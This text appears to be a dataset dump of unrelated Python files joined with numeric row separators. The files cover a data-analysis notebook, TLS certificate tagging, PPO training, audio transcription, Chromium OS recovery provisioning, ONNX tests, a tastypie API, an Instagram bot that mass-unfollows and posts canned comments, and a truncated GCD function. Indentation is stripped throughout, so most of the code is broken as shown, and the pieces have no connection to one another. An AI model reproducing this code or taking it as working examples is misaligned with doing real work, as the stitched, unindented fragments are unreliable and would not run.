len(num_cols), len(CLAIM_CAT_COLS)
# %% [markdown]
'''
### Bi-variate
'''
# %% [markdown]
'''
### Correlation
'''
# %%
plt.figure(figsize=(10, 10))
sns.heatmap(claims_with_amount[num_cols].corr(), annot=True)
plt.show()
# Mostly positive correlated data
# %% [markdown]
'''
#### Numeric-Numeric (Scatter plot)
'''
# %%
eu.plot_two_variables(claims_with_amount, 'CLAIMED_AMOUNT', 'CLAIM_PAID_AMOUNT')
# %%
plt.figure(figsize=(10, 10))
eu.plot_two_variables(claims_with_amount, 'UNITS_USAGE', 'CLAIM_PAID_AMOUNT')
# %% [markdown]
'''
#### Numeric-Categorical (Box and violin)
'''
# %%
new_cols_cat = CLAIM_CAT_COLS[:]
for rem_col in ["DEALER_NUMBER", "CAUSAL_REG_PART", "DEALER_CITY", "DEALER_STATE", "FAULT_LOCN", "FAULT_CODE"]:
new_cols_cat.remove(rem_col)
for col in new_cols_cat:
plt.figure(figsize=(35, 10))
print(f"\nPlotting {col} vs CLAIM_PAID_AMOUNT\n")
eu.plot_two_variables(claims_with_amount, col, 'CLAIM_PAID_AMOUNT', x_rotation=90, legend=False)
# %% [markdown]
'''
#### Categorical-Categorical (Cross Table)
'''
# %%
pd.crosstab(claims_with_amount['CLAIM_TYPE'], claims_with_amount['CLAIM_STATE'])
# %%
# TODO: Not working; need to check data types
pd.crosstab(claims_with_amount['CLAIM_TYPE'], claims_with_amount[['CLAIM_STATE', 'APPLICABLE_POLICY',
'DEALER_NUMBER',
'DEALER_CITY',
'DEALER_STATE',
'DEALER_COUNTRY',
'CAUSAL_REG_PART',
'FAULT_CODE',
'FAULT_LOCN',
'REG_PRODUCT_FAMILY_NAME',
'REG_SERIES_NAME',
'MODEL_NAME',
'REG_MODEL_CODE',
'VARIANT']])
# %% [markdown]
'''
Print a data frame with color
'''
# %%
'''
Drop columns
Single valued
Drop Rows
'''
| 5,297 | 1,870 |
from ztag.annotation import *
class AmericanMegatrends(Annotation):
protocol = protocols.HTTPS
subprotocol = protocols.HTTPS.TLS
port = None
tests = {
"american_megatrends":{
"local_metadata":{
"manufacturer": Manufacturer.AMERICANMEGATRENDS
}
}
}
def process(self, obj, meta):
organization = obj["certificate"]["parsed"]["subject"]["organization"][0]
if "American Megatrends Inc" in organization:
meta.local_metadata.manufacturer = Manufacturer.AMERICANMEGATRENDS
return meta
| 603 | 184 |
"""
The :mod:`viz` module provides visualization capability
"""
import viz.BarsViz
import viz.BernViz
import viz.GaussViz
import viz.SequenceViz
import viz.ProposalViz
import viz.PlotTrace
import viz.PlotELBO
import viz.PlotK
import viz.PlotHeldoutLik
import viz.PlotParamComparison
import viz.PlotComps
import viz.JobFilter
import viz.TaskRanker
import viz.BestJobSearcher
__all__ = ['GaussViz', 'BernViz', 'BarsViz', 'SequenceViz',
'PlotTrace', 'PlotELBO', 'PlotK', 'ProposalViz',
'PlotComps', 'PlotParamComparison',
'PlotHeldoutLik', 'JobFilter', 'TaskRanker', 'BestJobSearcher']
| 621 | 220 |
from typing import Tuple
import torch
from habitat_baselines.rl.ddppo.algo.ddppo import DDPPO
from torch.functional import Tensor
from torch.nn.functional import l1_loss
class WDDPPO(DDPPO):
"""Differences with DD-PPO:
- expands entropy calculation and tracking to three variables
- adds a regularization term to the offset prediction
"""
def __init__(
self,
*args,
offset_regularize_coef: float = 0.0,
pano_entropy_coef: float = 1.0,
offset_entropy_coef: float = 1.0,
distance_entropy_coef: float = 1.0,
**kwargs,
) -> None:
super().__init__(*args, **kwargs)
self.offset_regularize_coef = offset_regularize_coef
self.pano_entropy_coef = pano_entropy_coef
self.offset_entropy_coef = offset_entropy_coef
self.distance_entropy_coef = distance_entropy_coef
def get_advantages(self, rollouts) -> Tensor:
advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]
if not self.use_normalized_advantage:
return advantages
return (advantages - advantages.mean()) / (advantages.std() + 1e-5)
def update(self, rollouts) -> Tuple[float, float, float]:
advantages = self.get_advantages(rollouts)
value_loss_epoch = 0.0
action_loss_epoch = 0.0
entropy_loss_epoch = 0.0
pano_entropy_epoch = 0.0
offset_entropy_epoch = 0.0
distance_entropy_epoch = 0.0
for _e in range(self.ppo_epoch):
data_generator = rollouts.recurrent_generator(
advantages, self.num_mini_batch
)
for sample in data_generator:
(
obs_batch,
recurrent_hidden_states_batch,
actions_batch,
prev_actions_batch,
value_preds_batch,
return_batch,
masks_batch,
old_action_log_probs_batch,
adv_targ,
) = sample
# Reshape to do in a single forward pass for all steps
(
values,
action_log_probs,
entropy,
_,
) = self.actor_critic.evaluate_actions(
obs_batch,
recurrent_hidden_states_batch,
prev_actions_batch,
masks_batch,
actions_batch,
)
entropy_loss = (
self.pano_entropy_coef * entropy["pano"]
+ self.offset_entropy_coef * entropy["offset"]
+ self.distance_entropy_coef * entropy["distance"]
).mean() * self.entropy_coef
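                # The next lines compute the standard PPO clipped surrogate
                # objective (sketch of the math being implemented):
                #   L_clip = E[ min(r_t * A_t, clip(r_t, 1 - eps, 1 + eps) * A_t) ]
                # where r_t = pi_theta(a|s) / pi_theta_old(a|s) is the probability
                # ratio, A_t the advantage estimate, and eps = self.clip_param;
                # action_loss is the negative of this objective.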
ratio = torch.exp(
action_log_probs - old_action_log_probs_batch
)
surr1 = ratio * adv_targ
surr2 = (
torch.clamp(
ratio, 1.0 - self.clip_param, 1.0 + self.clip_param
)
* adv_targ
)
action_loss = -torch.min(surr1, surr2).mean()
if self.use_clipped_value_loss:
value_pred_clipped = value_preds_batch + (
values - value_preds_batch
).clamp(-self.clip_param, self.clip_param)
value_losses = (values - return_batch).pow(2)
value_losses_clipped = (
value_pred_clipped - return_batch
).pow(2)
value_loss = (
0.5
* torch.max(value_losses, value_losses_clipped).mean()
)
else:
value_loss = 0.5 * (return_batch - values).pow(2).mean()
value_loss = value_loss * self.value_loss_coef
# slight regularization to the offset
offset_loss = 0.0
if "offset" in actions_batch:
offset_loss = self.offset_regularize_coef * l1_loss(
self.actor_critic.net.offset_to_continuous(
actions_batch["offset"]
),
torch.zeros_like(actions_batch["offset"]),
)
self.optimizer.zero_grad()
loss = value_loss + action_loss + offset_loss - entropy_loss
self.before_backward(loss)
loss.backward()
self.after_backward(loss)
self.before_step()
self.optimizer.step()
self.after_step()
value_loss_epoch += value_loss.item()
action_loss_epoch += action_loss.item()
entropy_loss_epoch += entropy_loss.item()
pano_entropy_epoch += entropy["pano"].mean().item()
offset_entropy_epoch += entropy["offset"].mean().item()
distance_entropy_epoch += entropy["distance"].mean().item()
num_updates = self.ppo_epoch * self.num_mini_batch
return (
value_loss_epoch / num_updates,
action_loss_epoch / num_updates,
entropy_loss_epoch / num_updates,
pano_entropy_epoch / num_updates,
offset_entropy_epoch / num_updates,
distance_entropy_epoch / num_updates,
)
| 5,532 | 1,566 |
import sys
import configs as cfg
from video2wav import Video2Wav_Converter
from segment_speech import Segment_Speech
from transcribe_speech import Transcribe_Speech
from utils import create_dir
def convert_video_to_wav():
create_dir(cfg.preprocessed_wav_savepath)
create_dir(cfg.extracted_wav_savepath)
v2w = Video2Wav_Converter(input_video_dataset_path=cfg.input_video_data_path,
input_file_format=cfg.input_video_format,
extracted_wav_savepath=cfg.extracted_wav_savepath,
acodec=cfg.acodec,
sampling_rate=cfg.wav_extraction_output_sampling_rate)
v2w.do()
def segment_speech():
create_dir(cfg.preprocessed_wav_savepath)
create_dir(cfg.segmented_wav_savepath)
ss = Segment_Speech(in_unsegmented_wav_path=cfg.unsegmented_input_wav_path,
out_wav_savepath = cfg.segmented_wav_savepath,
input_file_format = cfg.segmentation_input_wav_format,
sampling_rate = cfg.segmentation_source_sampling_rate,
resampling_rate = cfg.segmentation_output_resampling_rate,
min_silence_len=400,
keep_silence=100,
silence_chunk_len=100,
silence_thresh=-40,
skip_idx=0)
ss.do()
def transcribe_speech():
ts = Transcribe_Speech(in_segmented_wav_path = cfg.segmented_input_wav_path,
out_meta_filename = cfg.meta_name,
input_file_format = cfg.transcription_input_wav_format,
sampling_rate = cfg.transcription_audio_sampling_rate,
wav_channel = cfg.wav_channel,
language_code=cfg.language_code)
ts.do()
if __name__ == "__main__":
assert len(sys.argv) == 2, "[ERROR] option must be provided!"
if sys.argv[1] in [0, "0"]:
convert_video_to_wav()
elif sys.argv[1] in [1, "1"]:
segment_speech()
elif sys.argv[1] in [2, "2"]:
transcribe_speech()
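# Illustrative invocation of the three pipeline stages (the script name is a
# placeholder; the stage numbers map to the argv dispatch above):
#   python pipeline.py 0   # extract wav audio from the input videos
#   python pipeline.py 1   # segment the extracted speech on silence
#   python pipeline.py 2   # transcribe the segmented wav files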
| 1,791 | 754 |
import pandas as pd
dfm = pd.read_csv('h3.bed', sep='\t', header=None, index_col=None)
dfm.columns = ['chrom', 'start', 'end']
dfm['length'] = dfm['end'] - dfm['start']
dfm.to_csv('h3.tsv', sep='\t', index=None) | 216 | 96 |
# -*- coding: utf-8 -*-
# Copyright 2018 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provision a recovery image for OOBE autoconfiguration.
This script populates the OOBE autoconfiguration data
(/stateful/unencrypted/oobe_auto_config/config.json) with the given parameters.
Additionally, it marks the image as being "hands-free", i.e. requiring no
physical user interaction to remove the recovery media before rebooting after
the recovery procedure has completed.
Any parameters prefixed with --x (e.g. --x-demo-mode) correspond directly to
generated elements in the configuration expected by OOBE.
"""
from __future__ import print_function
import json
import os
import sys
import uuid
from chromite.lib import commandline
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import image_lib
from chromite.lib import osutils
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
# OOBE auto-config parameters as they appear in
# chrome/browser/chromeos/login/configuration_keys.h
# Please keep the keys grouped in the same order as the source file.
_CONFIG_PARAMETERS = (
('demo-mode', bool, 'Whether the device should be placed into demo mode.'),
('network-onc', str, 'ONC blob for network configuration.'),
('network-auto-connect', bool,
'Whether the network screen should automatically proceed with '
'connected network.'),
('eula-send-statistics', bool,
'Whether the device should send usage statistics.'),
('eula-auto-accept', bool,
'Whether the EULA should be automatically accepted.'),
('update-skip', bool,
     'Whether the update check should be skipped entirely (it may be '
'required for future version pinning).'),
('wizard-auto-enroll', bool,
'Whether the wizard should automatically start enrollment at the '
'appropriate moment.'),
)
# Set of flags to specify when building with --generic.
_GENERIC_FLAGS = {
'network-auto-connect': True,
'eula-send-statistics': True,
'eula-auto-accept': True,
'update-skip': True,
}
# Mapping of flag type to argparse kwargs.
_ARG_TYPES = {
str: {},
bool: {'action': 'store_true'},
}
# Name of the OOBE directory in unencrypted/.
_OOBE_DIRECTORY = 'oobe_auto_config'
# Name of the configuration file in the recovery image.
_CONFIG_PATH = 'config.json'
# Name of the file containing the enrollment domain.
_DOMAIN_PATH = 'enrollment_domain'
def SanitizeDomain(domain):
"""Sanitized |domain| for use in recovery.
Args:
domain: (str) The original string.
Returns:
(str) The sanitized domain name, possibly using punycode to disambiguate.
"""
# Encode using punycode ("idna" here) to prevent homograph attacks.
# Once that's been normalized to ASCII, normalize to lowercase.
return domain.encode('idna').decode('utf-8').lower()
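# Illustrative example of the sanitization above (the domain is hypothetical):
# a unicode label is converted to its ASCII punycode form and lowercased, e.g.
#   SanitizeDomain('BÜCHER.example')  ->  'xn--bcher-kva.example'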
def GetConfigContent(opts):
"""Formats OOBE autoconfiguration from commandline namespace.
Args:
opts: A commandline namespace containing OOBE autoconfig opts.
Returns:
A JSON string representation of the requested configuration.
"""
conf = {}
for flag, _, _ in _CONFIG_PARAMETERS:
conf[flag] = getattr(opts, 'x_' + flag.replace('-', '_'))
if opts.wifi_ssid:
conf['network-onc'] = {
'GUID': str(uuid.uuid4()),
'Name': opts.wifi_ssid,
'Type': 'WiFi',
'WiFi': {
'AutoConnect': True,
'HiddenSSID': False,
'SSID': opts.wifi_ssid,
'Security': 'None',
},
}
if opts.use_ethernet:
conf['network-onc'] = {
'GUID': str(uuid.uuid4()),
'Name': 'Ethernet',
'Type': 'Ethernet',
'Ethernet': {
'Authentication': 'None',
},
}
return json.dumps(conf)
def PrepareImage(path, content, domain=None):
"""Prepares a recovery image for OOBE autoconfiguration.
Args:
path: Path to the recovery image.
content: The content of the OOBE autoconfiguration.
domain: Which domain to enroll to.
"""
with osutils.TempDir() as tmp, \
image_lib.LoopbackPartitions(path, tmp) as image:
stateful_mnt = image.Mount((constants.CROS_PART_STATEFUL,),
mount_opts=('rw',))[0]
# /stateful/unencrypted may not exist at this point in time on the
# recovery image, so create it root-owned here.
unencrypted = os.path.join(stateful_mnt, 'unencrypted')
osutils.SafeMakedirs(unencrypted, mode=0o755, sudo=True)
# The OOBE autoconfig directory must be owned by the chronos user so
# that we can delete the config file from it from Chrome.
oobe_autoconf = os.path.join(unencrypted, _OOBE_DIRECTORY)
osutils.SafeMakedirsNonRoot(oobe_autoconf, user='chronos')
# Create the config file to be owned by the chronos user, and write the
# given data into it.
config = os.path.join(oobe_autoconf, _CONFIG_PATH)
osutils.WriteFile(config, content, sudo=True)
cros_build_lib.sudo_run(['chown', 'chronos:chronos', config])
# If we have a plaintext domain name, write it.
if domain:
domain_path = os.path.join(oobe_autoconf, _DOMAIN_PATH)
osutils.WriteFile(domain_path, SanitizeDomain(domain), sudo=True)
cros_build_lib.sudo_run(['chown', 'chronos:chronos', domain_path])
def ParseArguments(argv):
"""Returns a namespace for the CLI arguments."""
parser = commandline.ArgumentParser(description=__doc__)
parser.add_argument('image', help='Path of recovery image to populate.')
# Prefix raw config elements with --x.
for flag, flag_type, help_text in _CONFIG_PARAMETERS:
parser.add_argument('--x-%s' % flag, help=help_text,
**_ARG_TYPES[flag_type])
parser.add_argument('--generic', action='store_true',
help='Set defaults for common configuration options.')
parser.add_argument('--dump-config', action='store_true',
help='Dump generated configuration file to stdout.')
parser.add_argument('--config', type='path', required=False,
help='Path to pre-generated configuration file to use, '
'overriding other flags set.')
parser.add_argument('--wifi-ssid', type=str, required=False,
help='If specified, generates an ONC for auto-connecting '
'to the given SSID. The network must not use any '
'security (i.e. be an open network), or the device '
'will fail to connect.')
parser.add_argument('--use-ethernet', action='store_true',
help='If specified, generates an ONC for auto-connecting '
'via ethernet.')
parser.add_argument('--enrollment-domain', type=str, required=False,
help='Text to visually identify the enrollment token in '
'recovery.')
opts = parser.parse_args(argv)
if opts.use_ethernet and opts.wifi_ssid:
parser.error('cannot specify --wifi-ssid and --use-ethernet together')
if opts.generic:
for opt, val in _GENERIC_FLAGS.items():
setattr(opts, 'x_' + opt.replace('-', '_'), val)
opts.Freeze()
return opts
def main(argv):
cros_build_lib.AssertInsideChroot()
opts = ParseArguments(argv)
if opts.config:
config_content = osutils.ReadFile(opts.config)
else:
config_content = GetConfigContent(opts)
logging.info('Using config: %s', config_content)
if opts.dump_config:
print(config_content)
PrepareImage(opts.image, config_content, opts.enrollment_domain)
| 7,762 | 2,397 |
import os
import sys
from Amazon import Amazon
from OpenStack import OpenStack
if sys.version_info < (2, 7):
raise Exception("Python version 2.7 minimum is required for running this script.")
clouds = [OpenStack(), Amazon()]
for cloud in clouds:
cloud.create()
print('Press \'A\' to destroy instances created.')
consoleInput = os.read(0, 1)
while consoleInput != b'A':
consoleInput = os.read(0, 1)
for cloud in clouds:
cloud.destroy()
print("Delivrable terminated.")
| 524 | 165 |
import os
import unittest
from distutils.version import StrictVersion
from io import StringIO
import contextlib
import numpy
from numpy.testing import assert_almost_equal
import onnx
import onnxruntime
from onnx import numpy_helper, helper
from skl2onnx.algebra.onnx_ops import dynamic_class_creation
from skl2onnx.algebra import OnnxOperator
from skl2onnx.proto import onnx_proto
class TestMetaOnnx(unittest.TestCase):
def setUp(self):
self._algebra = dynamic_class_creation()
def test_dynamic_class_creation(self):
res = self._algebra
for cl in res:
assert hasattr(cl, '__init__')
assert hasattr(cl, '__doc__')
def test_mul(self):
from skl2onnx.algebra.onnx_ops import OnnxMul
assert OnnxMul.operator_name == 'Mul'
assert isinstance(OnnxMul('a', 'b'), OnnxOperator)
@unittest.skipIf(StrictVersion(onnx.__version__) < StrictVersion("1.5.0"),
reason="too unstable with older versions")
@unittest.skipIf(StrictVersion(onnxruntime.__version__) <
StrictVersion("0.5.0"),
reason="too unstable with older versions")
def test_onnx_spec(self):
untested = {'AveragePool', # issue with ceil_mode
'BitShift', # opset 11
'Cast', # unsupported type
'Compress', # shape inference fails
'CumSum', # opset 11
# Input X must be 4-dimensional. X: {1,1,3}
'ConvInteger',
'ConvTranspose',
'DepthToSpace', # opset 11
'DequantizeLinear',
'Equal', # opset 11
'Expand', # shape inference fails
'GatherElements', # opset 11
'MatMulInteger',
'MaxPool', # issue with ceil_mode
'Mod',
'QLinearConv',
'QLinearMatMul',
"QuantizeLinear",
"Round", # opset 11
'Scan', # Graph attribute inferencing returned type
# information for 2 outputs. Expected 1
# Node () has input size 5 not in range [min=1, max=1].
'ScatterElements', # opset 11
'Unique', # opset 11
"Upsample",
}
folder = os.path.dirname(onnx.__file__)
folder = os.path.join(folder, "backend", "test", "data", "node")
subs = os.listdir(folder)
for sub in subs:
path = os.path.join(folder, sub)
model = os.path.join(path, "model.onnx")
if not os.path.exists(model):
continue
dataset = os.path.join(path, "test_data_set_0")
inps = [os.path.join(dataset, "input_0.pb")]
outs = [os.path.join(dataset, "output_0.pb")]
if not os.path.exists(inps[0]) or not os.path.exists(outs[0]):
continue
for d in range(1, 9):
name = os.path.join(dataset, "input_%d.pb" % d)
if os.path.exists(name):
inps.append(name)
else:
break
for d in range(1, 9):
name = os.path.join(dataset, "output_%d.pb" % d)
if os.path.exists(name):
outs.append(name)
else:
break
tests = dict(model=model, inputs=inps, outputs=outs)
try:
op_type, success, reason = self._check_algebra_onnxruntime(
untested=untested, **tests)
except Exception as e:
raise Exception(
"Unable to handle operator '{}'".format(model)) from e
if __name__ == "__main__":
if not success:
print("-", op_type, " Failure", reason.split('\n')[0])
def _load_data(self, name):
tensor = onnx.TensorProto()
with open(name, 'rb') as fid:
content = fid.read()
tensor.ParseFromString(content)
return tensor
def _load_data_test(self, name, test):
try:
return self._load_data(name)
except Exception as e:
raise RuntimeError(
"Unable to load data '{}' for test '{}'"
".".format(name, test)) from e
def _check_algebra_onnxruntime(self, untested=None, model=None,
inputs=None, outputs=None):
if untested is None:
untested = {}
name = os.path.split(os.path.split(model)[0])[-1]
try:
onx = onnx.load(model)
except Exception as e:
raise RuntimeError(
"Unable to load model '{}' - '{}'.".format(name, model)) from e
inps = [self._load_data_test(input, name) for input in inputs]
outs = [self._load_data_test(output, name) for output in outputs]
if len(onx.graph.node) != 1:
op_type = ",".join([n.op_type for n in onx.graph.node])
return (op_type, False,
"The graph contains more than one node. Not tested.")
# get the operator to test
node = onx.graph.node[0]
op_class = self._algebra.get("Onnx" + node.op_type, None)
if op_class is None:
raise RuntimeError(
"Unable to find the corresponding operator in the algebra "
"'{}'.".format(node.op_type))
atts = {}
if node.attribute:
for att in node.attribute:
atts[att.name] = helper.get_attribute_value(att)
if len(node.input) != len(inps):
if node.op_type in untested:
return (node.op_type, False,
"unexpected number of inputs {} != {}".format(
len(node.input), len(inps)))
raise RuntimeError(
"'{}': unexpected number of inputs {} != {}.".format(
node.op_type, len(node.input), len(inps)))
if len(node.output) < len(outs):
raise RuntimeError(
"'{}': unexpected number of inputs {} != {}.".format(
node.op_type, len(node.output), len(outs)))
# See file onnx-ml.proto.
if inps[0].data_type in (onnx_proto.TensorProto.FLOAT16, ):
# not supported
return (node.op_type, False,
"Unsupported type {}".format(inps[0].data_type))
expected_data_type = (onnx_proto.TensorProto.UINT8,
onnx_proto.TensorProto.INT32,
onnx_proto.TensorProto.INT64,
onnx_proto.TensorProto.FLOAT,
onnx_proto.TensorProto.DOUBLE,
onnx_proto.TensorProto.BOOL,
onnx_proto.TensorProto.STRING)
if inps[0].data_type not in expected_data_type:
if node.op_type in untested:
return (node.op_type, False,
"unexpected data_type {} not in {}".format(
inps[0].data_type, expected_data_type))
raise NotImplementedError(
"Unexpected data_type {}: {}\n---\n{}\n---".format(
inps[0].data_type, node.op_type, inps[0]))
# prepare the inputs
inp_arrays = [numpy_helper.to_array(inp) for inp in inps]
out_arrays = [numpy_helper.to_array(out) for out in outs]
for i in range(len(inp_arrays)):
inp_array = inp_arrays[i]
if inp_array.dtype == numpy.float64:
inp_arrays[i] = inp_array.astype(numpy.float32)
inps[i] = numpy_helper.from_array(inp_arrays[i])
# check the test from onnx is working.
import onnxruntime as ort
monx = onx.SerializeToString()
try:
sess = ort.InferenceSession(monx)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load ONNX model {}".format(e))
raise RuntimeError(
"'{}': cannot load(1) due to {}.".format(node.op_type, e))
names = [i.name for i in sess.get_inputs()]
ort_inputs = {name: inp_array for name,
inp_array in zip(names, inp_arrays)}
try:
Y = sess.run(None, ort_inputs)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise RuntimeError(
"'{}': cannot run(1) due to {}.".format(node.op_type, e))
for exp, got in zip(out_arrays, Y):
try:
assert_almost_equal(exp, got, decimal=4)
except TypeError:
pass
# instantiate the operator
for i, inp in enumerate(inps):
inp.name = 'I%d' % i
op = op_class(*[inp.name for inp in inps],
output_names=[out.name for out in outs],
**atts)
st = StringIO()
with contextlib.redirect_stdout(st):
with contextlib.redirect_stderr(st):
ort_inputs = {'I%d' % i: inp for i, inp in enumerate(inps)}
try:
onx2 = op.to_onnx(ort_inputs)
except (RuntimeError, NotImplementedError, TypeError) as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise NotImplementedError(
"Unable to continue {}\n{}\n{}".format(
inp_array.dtype, st.getvalue(), ort_inputs)) from e
# test with onnxruntime
monx2 = onx2.SerializeToString()
try:
sess = ort.InferenceSession(monx2)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise RuntimeError("'{}': cannot load(2) due to {}\n"
"---ONNX--\n{}\n---SKL2ONNX---\n{}".format(
node.op_type, e, onx, onx2))
names = [i.name for i in sess.get_inputs()]
ort_inputs = {name: inp_array for name,
inp_array in zip(names, inp_arrays)}
try:
Y = sess.run(None, ort_inputs)
except RuntimeError as e:
if node.op_type in untested:
return (node.op_type, False,
"cannot load skl2onnx model {}".format(e))
raise RuntimeError("'{}': cannot run(2) due to {}\n"
"---ONNX--\n{}\n---SKL2ONNX---\n{}".format(
node.op_type, e, onx, onx2))
for exp, got in zip(out_arrays, Y):
try:
assert_almost_equal(exp, got, decimal=4)
except (TypeError, AssertionError):
pass
return node.op_type, True, ""
if __name__ == "__main__":
unittest.main()
| 11,466 | 3,402 |
from drink_partners.contrib.utils.points_distance import (
get_coordinate_distance_points
)
class TestCalculatePointsDistance:
def test_should_get_coordinate_distance_points(self):
point_a = [4, 0]
point_b = [6, 6]
assert get_coordinate_distance_points(
a=point_a,
b=point_b
) == 6.324555320336759
| 366 | 129 |
from tastypie import fields
from tastypie import http
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from tastypie.exceptions import ImmediateHttpResponse
from ..mtapi import MTResource, MTAuthorization
from .models import Profile, Environment, Element, Category
import logging
logger = logging.getLogger(__name__)
class EnvironmentAuthorization(MTAuthorization):
"""Atypically named permission."""
@property
def permission(self):
"""This permission should be checked by is_authorized."""
return "environments.manage_environments"
class ProfileResource(MTResource):
"""Create, Read, Update, and Delete capabilities for Profile."""
class Meta(MTResource.Meta):
queryset = Profile.objects.all()
fields = ["id", "name"]
authorization = EnvironmentAuthorization()
ordering = ["id", "name"]
filtering = {
"name": ALL,
}
@property
def model(self):
"""Model class related to this resource."""
return Profile
class CategoryResource(MTResource):
"""Create, Read, Update and Delete capabilities for Category."""
elements = fields.ToManyField(
"moztrap.model.environments.api.ElementResource",
"elements",
full=True,
readonly=True
)
class Meta(MTResource.Meta):
queryset = Category.objects.all()
fields = ["id", "name"]
authorization = EnvironmentAuthorization()
ordering = ["id", "name"]
filtering = {
"name": ALL,
}
@property
def model(self):
"""Model class related to this resource."""
return Category
class ElementResource(MTResource):
"""Create, Read, Update and Delete capabilities for Element."""
category = fields.ForeignKey(CategoryResource, "category")
class Meta(MTResource.Meta):
queryset = Element.objects.all()
fields = ["id", "name", "category"]
authorization = EnvironmentAuthorization()
filtering = {
"category": ALL_WITH_RELATIONS,
"name": ALL,
}
ordering = ["id", "name"]
@property
def model(self):
"""Model class related to this resource."""
return Element
@property
def read_create_fields(self):
"""List of fields that are required for create
but read-only for update."""
return ["category"]
class EnvironmentResource(MTResource):
"""Create, Read and Delete capabilities for environments"""
elements = fields.ToManyField(ElementResource, "elements")
# an environment is not required to be associated with a profile
profile = fields.ForeignKey(ProfileResource, "profile", null=True)
class Meta(MTResource.Meta):
queryset = Environment.objects.all()
list_allowed_methods = ['get', 'post', 'patch']
detail_allowed_methods = ['get', 'put', 'delete']
fields = ["id", "profile", "elements"]
filtering = {
"elements": ALL,
"profile": ALL_WITH_RELATIONS,
}
ordering = ["id", "profile"]
@property
def model(self):
"""Model class related to this resource."""
return Environment
def hydrate_m2m(self, bundle):
"""Validate the elements,
which should each belong to separate categories."""
bundle = super(EnvironmentResource, self).hydrate_m2m(bundle)
elem_categories = [elem.data['category'] for elem in
bundle.data['elements']]
if len(set(elem_categories)) != len(bundle.data['elements']):
error_msg = "Elements must each belong to a different Category."
logger.error(error_msg)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_msg))
return bundle
def patch_list(self, request, **kwargs):
"""
Since there is no RESTful way to do what we want to do, and since
``PATCH`` is poorly defined with regards to RESTfulness, we are
overloading ``PATCH`` to take a single request that performs
combinatorics and creates multiple objects.
"""
import itertools
from django.db import transaction
from tastypie.utils import dict_strip_unicode_keys
deserialized = self.deserialize(
request,
request.raw_post_data,
format=request.META.get('CONTENT_TYPE', 'application/json'))
# verify input
categories = deserialized.pop('categories', [])
if not categories or not isinstance(categories, list):
error_msg = "PATCH request must contain categories list."
logger.error(error_msg)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_msg))
# do the combinatorics
elem_lists = []
for cat in categories:
# do some type validation / variation
if isinstance(cat, basestring):
# simple case of create all the combinations
cat = Category.objects.filter(id=self._id_from_uri(cat))
elem_list = Element.objects.filter(category=cat)
elif isinstance(cat, dict):
# we must be working with at least one partial category
category = Category.objects.filter(
id=self._id_from_uri(cat['category']))
elem_list = Element.objects.filter(category=category)
if 'exclude' in cat:
# exclude some element(s) from the combinations
exclude_uris = cat['exclude']
exclude_ids = [int(
self._id_from_uri(x)) for x in exclude_uris]
elem_list = [elem for elem in elem_list
if elem.id not in exclude_ids]
elif 'include' in cat:
# include only a few elements in the combinations
include_uris = cat['include']
include_ids = [int(
self._id_from_uri(x)) for x in include_uris]
elem_list = [elem for elem in elem_list
if elem.id in include_ids]
else:
# don't worry about this,
# it'll act like a list of categories
pass # pragma: no cover
else:
error_msg = "categories list must contain resource uris or hashes."
logger.error(error_msg)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_msg))
# save off the elements from this category that will be used
elem_lists.append(elem_list)
# create all the combinations of elements from categories
combinatorics = itertools.product(*elem_lists)
# do the creation
with transaction.commit_on_success():
for combo in combinatorics:
deserialized['elements'] = combo
bundle = self.build_bundle(
data=dict_strip_unicode_keys(deserialized))
bundle.request.META['REQUEST_METHOD'] = 'PATCH'
self.is_valid(bundle, request)
self.obj_create(bundle, request=request)
# don't try to reply with data, the request doesn't
# really match the results.
return http.HttpAccepted()
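# An illustrative PATCH payload for patch_list above (URIs and ids are
# hypothetical); "categories" may mix plain category URIs with hashes that
# restrict which elements enter the combinations:
#   {
#       "profile": "/api/v1/profile/1/",
#       "categories": [
#           "/api/v1/category/1/",
#           {"category": "/api/v1/category/2/",
#            "exclude": ["/api/v1/element/5/"]},
#           {"category": "/api/v1/category/3/",
#            "include": ["/api/v1/element/7/", "/api/v1/element/8/"]}
#       ]
#   }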
| 7,526 | 1,893 |
# stop following followers ...
from instapy import InstaPy
from instapy import smart_run
session = InstaPy(username='' , password='')
with smart_run(session):
session.set_do_follow(enabled=True, percentage=100)
session.set_do_like(enabled=True, percentage=100)
session.unfollow_users(amount=100, allFollowing=True, style="RANDOM", unfollow_after=3*60*60*60, sleep_delay=450)
# 'allFollowing=True' unfollows anyone you are currently following.
session.unfollow_users(amount=100, nonFollowers= True, style="RANDOM", unfollow_after=3*60*60*60, sleep_delay=450)
# 'nonFollowers=True' unfollows only those who do not follow you back.
comentarios = ['Very good', 'Nice short','Gostei do seu post', ':)', ':D', 'Parabens', 'Perfect :)','Muito bom', 'Very nice']
"""Comentarios pré definidos """
session.set_do_comment(enabled=True, percentage=95)
session.set_comments(comentarios,media='Photo')
session.join_pods()
| 937 | 349 |
from os.path import exists
from sys import argv
from dbbot import CommandLineOptions
class WriterOptions(CommandLineOptions):
@property
def output_file_path(self):
return self._options.output_file_path
def _add_parser_options(self):
super(WriterOptions, self)._add_parser_options()
self._parser.add_option('-o', '--output',
dest='output_file_path',
help='path to the resulting html file',
)
def _get_validated_options(self):
if len(argv) < 2:
self._exit_with_help()
options = super(WriterOptions, self)._get_validated_options()
if not options.output_file_path:
self._parser.error('output html filename is required')
if not exists(options.db_file_path):
self._parser.error('database %s does not exist' % options.db_file_path)
return options
| 890 | 255 |
#!usr/bin/python
#coding:utf8
#mcd:max_common_divisor
def mcd(a, b):#a and b are natural numbers.
if a == b:
return a
t = min(a, b)
cd = [i for i in range(1, t+1) if a % i == 0 and b % i == 0]
m = max(cd)
return m | 223 | 113 |
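# An equivalent, faster formulation of mcd above (illustrative sketch; the name
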